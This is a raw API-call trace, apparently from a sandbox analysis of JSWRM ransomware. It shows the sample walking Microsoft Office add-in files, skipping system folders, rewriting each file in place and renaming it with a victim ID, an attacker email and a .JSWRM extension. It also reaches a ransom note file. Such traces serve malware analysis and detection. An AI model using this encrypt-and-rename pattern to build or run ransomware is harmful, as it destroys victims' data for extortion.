lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf12b7378, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xafa146a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x456d8d85, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x2257e0, cFileName="..", cAlternateFileName="")) returned 1 [0132.158] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0132.158] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0132.158] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf12b7378, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf12b7378, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xaf54f91, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3ce40, dwReserved0=0x60002, dwReserved1=0x2257e0, cFileName="ANALYS32.XLL", cAlternateFileName="")) returned 1 [0132.158] lstrcmpiW (lpString1="ANALYS32.XLL", lpString2=".") returned 1 [0132.158] lstrcmpiW (lpString1="ANALYS32.XLL", lpString2="..") returned 1 [0132.158] lstrcmpiW (lpString1="ANALYS32.XLL", lpString2="...") returned 1 [0132.158] lstrcmpiW (lpString1="ANALYS32.XLL", lpString2="windows") returned -1 [0132.158] lstrcmpiW (lpString1="ANALYS32.XLL", lpString2="recovery") returned -1 [0132.158] lstrcmpiW (lpString1="ANALYS32.XLL", lpString2="perflogs") returned -1 [0132.158] lstrcmpiW (lpString1="ANALYS32.XLL", lpString2="documents and settings") returned -1 [0132.158] lstrcmpiW (lpString1="ANALYS32.XLL", lpString2="$RECYCLE.BIN") returned 1 [0132.158] lstrcmpiW (lpString1="ANALYS32.XLL", lpString2="system volume information") returned -1 [0132.158] lstrcmpiW (lpString1="ANALYS32.XLL", lpString2="msocache") returned -1 [0132.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ANALYS32.XLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0132.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ANALYS32.XLL", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ANALYS32.XLL", lpUsedDefaultChar=0x0) returned 12 [0132.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ANALYS32.XLL", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0132.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ANALYS32.XLL", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ANALYS32.XLL", lpUsedDefaultChar=0x0) returned 12 [0132.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.158] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Library\\Analysis\\ANALYS32.XLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\library\\analysis\\analys32.xll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0132.159] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=249408) returned 1 [0132.159] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.160] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0132.173] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.173] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0132.173] CloseHandle (hObject=0x314) returned 1 [0132.174] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Library\\Analysis\\ANALYS32.XLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\library\\analysis\\analys32.xll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Library\\Analysis\\ANALYS32.XLL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\library\\analysis\\analys32.xll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.175] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xaf54f91, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xaf54f91, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xaf54f91, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xaed2, dwReserved0=0x60002, dwReserved1=0x2257e0, cFileName="ATPVBAEN.XLAM", cAlternateFileName="ATPVBA~1.XLA")) returned 1 [0132.175] lstrcmpiW (lpString1="ATPVBAEN.XLAM", lpString2=".") returned 1 [0132.175] lstrcmpiW (lpString1="ATPVBAEN.XLAM", lpString2="..") returned 1 [0132.175] lstrcmpiW (lpString1="ATPVBAEN.XLAM", lpString2="...") returned 1 [0132.175] lstrcmpiW (lpString1="ATPVBAEN.XLAM", lpString2="windows") returned -1 [0132.175] lstrcmpiW (lpString1="ATPVBAEN.XLAM", lpString2="recovery") returned -1 [0132.175] lstrcmpiW (lpString1="ATPVBAEN.XLAM", lpString2="perflogs") returned -1 [0132.175] lstrcmpiW (lpString1="ATPVBAEN.XLAM", lpString2="documents and settings") returned -1 [0132.175] lstrcmpiW (lpString1="ATPVBAEN.XLAM", lpString2="$RECYCLE.BIN") returned 1 [0132.175] lstrcmpiW (lpString1="ATPVBAEN.XLAM", lpString2="system volume information") returned -1 [0132.175] lstrcmpiW (lpString1="ATPVBAEN.XLAM", lpString2="msocache") returned -1 [0132.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ATPVBAEN.XLAM", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0132.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ATPVBAEN.XLAM", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATPVBAEN.XLAM", lpUsedDefaultChar=0x0) returned 13 [0132.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ATPVBAEN.XLAM", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0132.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ATPVBAEN.XLAM", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATPVBAEN.XLAM", lpUsedDefaultChar=0x0) returned 13 [0132.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.175] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.175] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Library\\Analysis\\ATPVBAEN.XLAM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\library\\analysis\\atpvbaen.xlam"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0132.177] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=44754) returned 1 [0132.177] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.178] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xaed0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xaed0, lpOverlapped=0x0) returned 1 [0132.182] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.182] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xaed0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xaed0, lpOverlapped=0x0) returned 1 [0132.183] CloseHandle (hObject=0x314) returned 1 [0132.184] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Library\\Analysis\\ATPVBAEN.XLAM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\library\\analysis\\atpvbaen.xlam"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Library\\Analysis\\ATPVBAEN.XLAM.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\library\\analysis\\atpvbaen.xlam.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.185] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xaf7b1fc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xaf7b1fc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xafa146a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x279af, dwReserved0=0x60002, dwReserved1=0x2257e0, cFileName="FUNCRES.XLAM", cAlternateFileName="FUNCRE~1.XLA")) returned 1 [0132.185] lstrcmpiW (lpString1="FUNCRES.XLAM", lpString2=".") returned 1 [0132.185] lstrcmpiW (lpString1="FUNCRES.XLAM", lpString2="..") returned 1 [0132.185] lstrcmpiW (lpString1="FUNCRES.XLAM", lpString2="...") returned 1 [0132.185] lstrcmpiW (lpString1="FUNCRES.XLAM", lpString2="windows") returned -1 [0132.185] lstrcmpiW (lpString1="FUNCRES.XLAM", lpString2="recovery") returned -1 [0132.185] lstrcmpiW (lpString1="FUNCRES.XLAM", lpString2="perflogs") returned -1 [0132.185] lstrcmpiW (lpString1="FUNCRES.XLAM", lpString2="documents and settings") returned 1 [0132.185] lstrcmpiW (lpString1="FUNCRES.XLAM", lpString2="$RECYCLE.BIN") returned 1 [0132.185] lstrcmpiW (lpString1="FUNCRES.XLAM", lpString2="system volume information") returned -1 [0132.185] lstrcmpiW (lpString1="FUNCRES.XLAM", lpString2="msocache") returned -1 [0132.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FUNCRES.XLAM", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0132.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FUNCRES.XLAM", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FUNCRES.XLAM", lpUsedDefaultChar=0x0) returned 12 [0132.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FUNCRES.XLAM", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0132.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FUNCRES.XLAM", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FUNCRES.XLAM", lpUsedDefaultChar=0x0) returned 12 [0132.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.185] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.185] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Library\\Analysis\\FUNCRES.XLAM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\library\\analysis\\funcres.xlam"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0132.187] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=162223) returned 1 [0132.187] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.187] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0132.242] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.242] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0132.243] CloseHandle (hObject=0x314) returned 1 [0132.243] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Library\\Analysis\\FUNCRES.XLAM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\library\\analysis\\funcres.xlam"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Library\\Analysis\\FUNCRES.XLAM.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\library\\analysis\\funcres.xlam.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.245] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x456d8d85, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x456d8d85, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x456fefdc, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x2257e0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0132.245] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0132.245] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0132.245] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0132.245] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0132.245] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0132.245] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0132.245] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0132.245] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0132.245] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0132.245] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0132.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0132.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241358, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0132.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0132.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0132.245] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xaf54f91, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xaf54f91, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb16b0a3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xaf030, dwReserved0=0x60002, dwReserved1=0x2257e0, cFileName="PROCDB.XLAM", cAlternateFileName="PROCDB~1.XLA")) returned 1 [0132.245] lstrcmpiW (lpString1="PROCDB.XLAM", lpString2=".") returned 1 [0132.245] lstrcmpiW (lpString1="PROCDB.XLAM", lpString2="..") returned 1 [0132.245] lstrcmpiW (lpString1="PROCDB.XLAM", lpString2="...") returned 1 [0132.245] lstrcmpiW (lpString1="PROCDB.XLAM", lpString2="windows") returned -1 [0132.245] lstrcmpiW (lpString1="PROCDB.XLAM", lpString2="recovery") returned -1 [0132.245] lstrcmpiW (lpString1="PROCDB.XLAM", lpString2="perflogs") returned 1 [0132.245] lstrcmpiW (lpString1="PROCDB.XLAM", lpString2="documents and settings") returned 1 [0132.245] lstrcmpiW (lpString1="PROCDB.XLAM", lpString2="$RECYCLE.BIN") returned 1 [0132.245] lstrcmpiW (lpString1="PROCDB.XLAM", lpString2="system volume information") returned -1 [0132.245] lstrcmpiW (lpString1="PROCDB.XLAM", lpString2="msocache") returned 1 [0132.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROCDB.XLAM", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0132.246] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROCDB.XLAM", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCDB.XLAM", lpUsedDefaultChar=0x0) returned 11 [0132.246] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROCDB.XLAM", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0132.246] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PROCDB.XLAM", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCDB.XLAM", lpUsedDefaultChar=0x0) returned 11 [0132.246] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.246] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.246] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Library\\Analysis\\PROCDB.XLAM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\library\\analysis\\procdb.xlam"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0132.246] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=716848) returned 1 [0132.247] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.247] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0132.259] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.259] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0132.260] CloseHandle (hObject=0x314) returned 1 [0132.260] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Library\\Analysis\\PROCDB.XLAM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\library\\analysis\\procdb.xlam"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Library\\Analysis\\PROCDB.XLAM.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\library\\analysis\\procdb.xlam.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.261] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xaf54f91, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xaf54f91, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb16b0a3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xaf030, dwReserved0=0x60002, dwReserved1=0x2257e0, cFileName="PROCDB.XLAM", cAlternateFileName="PROCDB~1.XLA")) returned 0 [0132.261] FindClose (in: hFindFile=0x232140 | out: hFindFile=0x232140) returned 1 [0132.261] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19889710, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19889710, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198afa29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5fbe0, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="EUROTOOL.XLAM", cAlternateFileName="EUROTO~1.XLA")) returned 1 [0132.261] lstrcmpiW (lpString1="EUROTOOL.XLAM", lpString2=".") returned 1 [0132.261] lstrcmpiW (lpString1="EUROTOOL.XLAM", lpString2="..") returned 1 [0132.261] lstrcmpiW (lpString1="EUROTOOL.XLAM", lpString2="...") returned 1 [0132.261] lstrcmpiW (lpString1="EUROTOOL.XLAM", lpString2="windows") returned -1 [0132.261] lstrcmpiW (lpString1="EUROTOOL.XLAM", lpString2="recovery") returned -1 [0132.261] lstrcmpiW (lpString1="EUROTOOL.XLAM", lpString2="perflogs") returned -1 [0132.261] lstrcmpiW (lpString1="EUROTOOL.XLAM", lpString2="documents and settings") returned 1 [0132.261] lstrcmpiW (lpString1="EUROTOOL.XLAM", lpString2="$RECYCLE.BIN") returned 1 [0132.261] lstrcmpiW (lpString1="EUROTOOL.XLAM", lpString2="system volume information") returned -1 [0132.261] lstrcmpiW (lpString1="EUROTOOL.XLAM", lpString2="msocache") returned -1 [0132.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EUROTOOL.XLAM", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0132.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EUROTOOL.XLAM", cchWideChar=13, lpMultiByteStr=0x345ebd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EUROTOOL.XLAM", lpUsedDefaultChar=0x0) returned 13 [0132.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EUROTOOL.XLAM", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0132.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EUROTOOL.XLAM", cchWideChar=13, lpMultiByteStr=0x345eba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 